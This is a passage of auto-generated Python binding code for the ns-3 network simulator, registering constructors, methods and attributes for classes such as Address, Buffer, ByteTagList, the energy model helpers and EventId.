register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker'])
register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue'])
return
def register_Ns3Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## address.h (module 'network'): ns3::Address::Address() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::Address::Address(uint8_t type, uint8_t const * buffer, uint8_t len) [constructor]
cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): ns3::Address::Address(ns3::Address const & address) [copy constructor]
cls.add_constructor([param('ns3::Address const &', 'address')])
## address.h (module 'network'): bool ns3::Address::CheckCompatible(uint8_t type, uint8_t len) const [member function]
cls.add_method('CheckCompatible',
'bool',
[param('uint8_t', 'type'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyAllFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyAllFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyAllTo(uint8_t * buffer, uint8_t len) const [member function]
cls.add_method('CopyAllTo',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyTo(uint8_t * buffer) const [member function]
cls.add_method('CopyTo',
'uint32_t',
[param('uint8_t *', 'buffer')],
is_const=True)
## address.h (module 'network'): void ns3::Address::Deserialize(ns3::TagBuffer buffer) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'buffer')])
## address.h (module 'network'): uint8_t ns3::Address::GetLength() const [member function]
cls.add_method('GetLength',
'uint8_t',
[],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsInvalid() const [member function]
cls.add_method('IsInvalid',
'bool',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsMatchingType(uint8_t type) const [member function]
cls.add_method('IsMatchingType',
'bool',
[param('uint8_t', 'type')],
is_const=True)
## address.h (module 'network'): static uint8_t ns3::Address::Register() [member function]
cls.add_method('Register',
'uint8_t',
[],
is_static=True)
## address.h (module 'network'): void ns3::Address::Serialize(ns3::TagBuffer buffer) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'buffer')],
is_const=True)
return
def register_Ns3AttributeConstructionList_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('Find',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True)
return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable]
cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False)
return
def register_Ns3Buffer_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Buffer() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize, bool initialize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize'), param('bool', 'initialize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(ns3::Buffer const & o) [copy constructor]
cls.add_constructor([param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtEnd(uint32_t end) [member function]
cls.add_method('AddAtEnd',
'bool',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::AddAtEnd(ns3::Buffer const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtStart(uint32_t start) [member function]
cls.add_method('AddAtStart',
'bool',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::Begin() const [member function]
cls.add_method('Begin',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Buffer',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFullCopy() const [member function]
cls.add_method('CreateFullCopy',
'ns3::Buffer',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::End() const [member function]
cls.add_method('End',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentEndOffset() const [member function]
cls.add_method('GetCurrentEndOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentStartOffset() const [member function]
cls.add_method('GetCurrentStartOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint8_t const * ns3::Buffer::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3BufferIterator_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator(ns3::Buffer::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Buffer::Iterator const &', 'arg0')])
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size, uint32_t initialChecksum) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size'), param('uint32_t', 'initialChecksum')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetDistanceFrom(ns3::Buffer::Iterator const & o) const [member function]
cls.add_method('GetDistanceFrom',
'uint32_t',
[param('ns3::Buffer::Iterator const &', 'o')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsEnd() const [member function]
cls.add_method('IsEnd',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsStart() const [member function]
cls.add_method('IsStart',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next() [member function]
cls.add_method('Next',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next(uint32_t delta) [member function]
cls.add_method('Next',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev() [member function]
cls.add_method('Prev',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev(uint32_t delta) [member function]
cls.add_method('Prev',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadLsbtohU16() [member function]
cls.add_method('ReadLsbtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadLsbtohU32() [member function]
cls.add_method('ReadLsbtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadLsbtohU64() [member function]
cls.add_method('ReadLsbtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadNtohU16() [member function]
cls.add_method('ReadNtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadNtohU32() [member function]
cls.add_method('ReadNtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadNtohU64() [member function]
cls.add_method('ReadNtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint8_t ns3::Buffer::Iterator::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(ns3::Buffer::Iterator start, ns3::Buffer::Iterator end) [member function]
cls.add_method('Write',
'void',
[param('ns3::Buffer::Iterator', 'start'), param('ns3::Buffer::Iterator', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU16(uint16_t data) [member function]
cls.add_method('WriteHtolsbU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU32(uint32_t data) [member function]
cls.add_method('WriteHtolsbU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU64(uint64_t data) [member function]
cls.add_method('WriteHtolsbU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU16(uint16_t data) [member function]
cls.add_method('WriteHtonU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU32(uint32_t data) [member function]
cls.add_method('WriteHtonU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU64(uint64_t data) [member function]
cls.add_method('WriteHtonU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU64(uint64_t data) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data, uint32_t len) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data'), param('uint32_t', 'len')])
return
def register_Ns3ByteTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::ByteTagIterator(ns3::ByteTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::ByteTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator::Item ns3::ByteTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagIterator::Item',
[])
return
def register_Ns3ByteTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::Item::Item(ns3::ByteTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetEnd() const [member function]
cls.add_method('GetEnd',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetStart() const [member function]
cls.add_method('GetStart',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): void ns3::ByteTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::ByteTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3ByteTagList_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList() [constructor]
cls.add_constructor([])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList(ns3::ByteTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList const &', 'o')])
## byte-tag-list.h (module 'network'): ns3::TagBuffer ns3::ByteTagList::Add(ns3::TypeId tid, uint32_t bufferSize, int32_t start, int32_t end) [member function]
cls.add_method('Add',
'ns3::TagBuffer',
[param('ns3::TypeId', 'tid'), param('uint32_t', 'bufferSize'), param('int32_t', 'start'), param('int32_t', 'end')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::Add(ns3::ByteTagList const & o) [member function]
cls.add_method('Add',
'void',
[param('ns3::ByteTagList const &', 'o')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtEnd(int32_t adjustment, int32_t appendOffset) [member function]
cls.add_method('AddAtEnd',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'appendOffset')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtStart(int32_t adjustment, int32_t prependOffset) [member function]
cls.add_method('AddAtStart',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'prependOffset')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator ns3::ByteTagList::Begin(int32_t offsetStart, int32_t offsetEnd) const [member function]
cls.add_method('Begin',
'ns3::ByteTagList::Iterator',
[param('int32_t', 'offsetStart'), param('int32_t', 'offsetEnd')],
is_const=True)
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
return
def register_Ns3ByteTagListIterator_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Iterator(ns3::ByteTagList::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator const &', 'arg0')])
## byte-tag-list.h (module 'network'): uint32_t ns3::ByteTagList::Iterator::GetOffsetStart() const [member function]
cls.add_method('GetOffsetStart',
'uint32_t',
[],
is_const=True)
## byte-tag-list.h (module 'network'): bool ns3::ByteTagList::Iterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item ns3::ByteTagList::Iterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagList::Iterator::Item',
[])
return
def register_Ns3ByteTagListIteratorItem_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::ByteTagList::Iterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator::Item const &', 'arg0')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::TagBuffer buf) [constructor]
cls.add_constructor([param('ns3::TagBuffer', 'buf')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::buf [variable]
cls.add_instance_attribute('buf', 'ns3::TagBuffer', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::end [variable]
cls.add_instance_attribute('end', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::size [variable]
cls.add_instance_attribute('size', 'uint32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::start [variable]
cls.add_instance_attribute('start', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3DeviceEnergyModelContainer_methods(root_module, cls):
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer::DeviceEnergyModelContainer(ns3::DeviceEnergyModelContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DeviceEnergyModelContainer const &', 'arg0')])
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer::DeviceEnergyModelContainer() [constructor]
cls.add_constructor([])
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer::DeviceEnergyModelContainer(ns3::Ptr<ns3::DeviceEnergyModel> model) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::DeviceEnergyModel >', 'model')])
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer::DeviceEnergyModelContainer(std::string modelName) [constructor]
cls.add_constructor([param('std::string', 'modelName')])
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer::DeviceEnergyModelContainer(ns3::DeviceEnergyModelContainer const & a, ns3::DeviceEnergyModelContainer const & b) [constructor]
cls.add_constructor([param('ns3::DeviceEnergyModelContainer const &', 'a'), param('ns3::DeviceEnergyModelContainer const &', 'b')])
## device-energy-model-container.h (module 'energy'): void ns3::DeviceEnergyModelContainer::Add(ns3::DeviceEnergyModelContainer container) [member function]
cls.add_method('Add',
'void',
[param('ns3::DeviceEnergyModelContainer', 'container')])
## device-energy-model-container.h (module 'energy'): void ns3::DeviceEnergyModelContainer::Add(ns3::Ptr<ns3::DeviceEnergyModel> model) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::DeviceEnergyModel >', 'model')])
## device-energy-model-container.h (module 'energy'): void ns3::DeviceEnergyModelContainer::Add(std::string modelName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'modelName')])
## device-energy-model-container.h (module 'energy'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::DeviceEnergyModel>*,std::vector<ns3::Ptr<ns3::DeviceEnergyModel>, std::allocator<ns3::Ptr<ns3::DeviceEnergyModel> > > > ns3::DeviceEnergyModelContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::DeviceEnergyModel > const, std::vector< ns3::Ptr< ns3::DeviceEnergyModel > > >',
[],
is_const=True)
## device-energy-model-container.h (module 'energy'): void ns3::DeviceEnergyModelContainer::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## device-energy-model-container.h (module 'energy'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::DeviceEnergyModel>*,std::vector<ns3::Ptr<ns3::DeviceEnergyModel>, std::allocator<ns3::Ptr<ns3::DeviceEnergyModel> > > > ns3::DeviceEnergyModelContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::DeviceEnergyModel > const, std::vector< ns3::Ptr< ns3::DeviceEnergyModel > > >',
[],
is_const=True)
## device-energy-model-container.h (module 'energy'): ns3::Ptr<ns3::DeviceEnergyModel> ns3::DeviceEnergyModelContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::DeviceEnergyModel >',
[param('uint32_t', 'i')],
is_const=True)
## device-energy-model-container.h (module 'energy'): uint32_t ns3::DeviceEnergyModelContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
return
def register_Ns3DeviceEnergyModelHelper_methods(root_module, cls):
## energy-model-helper.h (module 'energy'): ns3::DeviceEnergyModelHelper::DeviceEnergyModelHelper() [constructor]
cls.add_constructor([])
## energy-model-helper.h (module 'energy'): ns3::DeviceEnergyModelHelper::DeviceEnergyModelHelper(ns3::DeviceEnergyModelHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DeviceEnergyModelHelper const &', 'arg0')])
## energy-model-helper.h (module 'energy'): ns3::DeviceEnergyModelContainer ns3::DeviceEnergyModelHelper::Install(ns3::Ptr<ns3::NetDevice> device, ns3::Ptr<ns3::EnergySource> source) const [member function]
cls.add_method('Install',
'ns3::DeviceEnergyModelContainer',
[param('ns3::Ptr< ns3::NetDevice >', 'device'), param('ns3::Ptr< ns3::EnergySource >', 'source')],
is_const=True)
## energy-model-helper.h (module 'energy'): ns3::DeviceEnergyModelContainer ns3::DeviceEnergyModelHelper::Install(ns3::NetDeviceContainer deviceContainer, ns3::EnergySourceContainer sourceContainer) const [member function]
cls.add_method('Install',
'ns3::DeviceEnergyModelContainer',
[param('ns3::NetDeviceContainer', 'deviceContainer'), param('ns3::EnergySourceContainer', 'sourceContainer')],
is_const=True)
## energy-model-helper.h (module 'energy'): void ns3::DeviceEnergyModelHelper::Set(std::string name, ns3::AttributeValue const & v) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'v')],
is_pure_virtual=True, is_virtual=True)
## energy-model-helper.h (module 'energy'): ns3::Ptr<ns3::DeviceEnergyModel> ns3::DeviceEnergyModelHelper::DoInstall(ns3::Ptr<ns3::NetDevice> device, ns3::Ptr<ns3::EnergySource> source) const [member function]
cls.add_method('DoInstall',
'ns3::Ptr< ns3::DeviceEnergyModel >',
[param('ns3::Ptr< ns3::NetDevice >', 'device'), param('ns3::Ptr< ns3::EnergySource >', 'source')],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3EnergySourceHelper_methods(root_module, cls):
## energy-model-helper.h (module 'energy'): ns3::EnergySourceHelper::EnergySourceHelper() [constructor]
cls.add_constructor([])
## energy-model-helper.h (module 'energy'): ns3::EnergySourceHelper::EnergySourceHelper(ns3::EnergySourceHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EnergySourceHelper const &', 'arg0')])
## energy-model-helper.h (module 'energy'): ns3::EnergySourceContainer ns3::EnergySourceHelper::Install(ns3::Ptr<ns3::Node> node) const [member function]
cls.add_method('Install',
'ns3::EnergySourceContainer',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_const=True)
## energy-model-helper.h (module 'energy'): ns3::EnergySourceContainer ns3::EnergySourceHelper::Install(ns3::NodeContainer c) const [member function]
cls.add_method('Install',
'ns3::EnergySourceContainer',
[param('ns3::NodeContainer', 'c')],
is_const=True)
## energy-model-helper.h (module 'energy'): ns3::EnergySourceContainer ns3::EnergySourceHelper::Install(std::string nodeName) const [member function]
cls.add_method('Install',
'ns3::EnergySourceContainer',
[param('std::string', 'nodeName')],
is_const=True)
## energy-model-helper.h (module 'energy'): ns3::EnergySourceContainer ns3::EnergySourceHelper::InstallAll() const [member function]
cls.add_method('InstallAll',
'ns3::EnergySourceContainer',
[],
is_const=True)
## energy-model-helper.h (module 'energy'): void ns3::EnergySourceHelper::Set(std::string name, ns3::AttributeValue const & v) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'v')],
is_pure_virtual=True, is_virtual=True)
## energy-model-helper.h (module 'energy'): ns3::Ptr<ns3::EnergySource> ns3::EnergySourceHelper::DoInstall(ns3::Ptr<ns3::Node> node) const [member function]
cls.add_method('DoInstall',
'ns3::Ptr< ns3::EnergySource >',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3EventId_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_binary_comparison_operator('==')
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::EventId const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventId const &', 'arg0')])
## event-id.h (module 'core'): ns3::EventId::EventId() [constructor]
cls.add_constructor([])
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::Ptr<ns3::EventImpl> const & impl, uint64_t ts, uint32_t context, uint32_t uid) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::EventImpl > const &', 'impl'), param('uint64_t', 'ts'), param('uint32_t', 'context'), param('uint32_t', 'uid')])
## event-id.h (module 'core'): void ns3::EventId::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-id.h (module 'core'): uint32_t ns3::EventId::GetContext() const [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): uint64_t ns3::EventId::GetTs() const [member function]
cls.add_method('GetTs',
'uint64_t',
[],
is_const=True)
## event-id.h (module 'core'): uint32_t ns3::EventId::GetUid() const [member function]
cls.add_method('GetUid',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsExpired() const [member function]
cls.add_method('IsExpired',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsRunning() const [member function]
cls.add_method('IsRunning',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): ns3::EventImpl * ns3::EventId::PeekEventImpl() const [member function]
cls.add_method('PeekEventImpl',
'ns3::EventImpl *',
[],
